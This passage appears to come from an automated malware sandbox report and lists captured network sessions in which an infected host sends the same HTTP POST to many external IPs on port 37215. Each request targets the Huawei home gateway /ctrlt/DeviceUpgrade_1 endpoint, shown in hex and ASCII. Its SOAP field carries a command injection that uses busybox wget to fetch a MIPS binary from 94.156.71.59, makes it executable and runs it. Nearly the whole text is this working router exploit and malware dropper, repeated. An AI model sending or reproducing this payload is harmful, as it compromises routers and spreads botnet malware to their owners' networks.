31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1046192.168.2.1345050197.117.148.18737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.579607010 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1047192.168.2.134176841.33.179.17237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.582142115 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1048192.168.2.135742241.234.251.337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.584340096 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1049192.168.2.134424441.63.10.8437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.586504936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1050192.168.2.1356656197.178.190.17037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.589247942 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1051192.168.2.1345868156.11.159.18937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.591898918 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1052192.168.2.1342580156.147.58.25437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.594496965 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1053192.168.2.1354710197.82.43.24537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.597254038 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1054192.168.2.134657241.61.245.737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.600099087 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1055192.168.2.1347622156.2.52.20237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.602474928 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1056192.168.2.133913441.227.110.11637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.604927063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
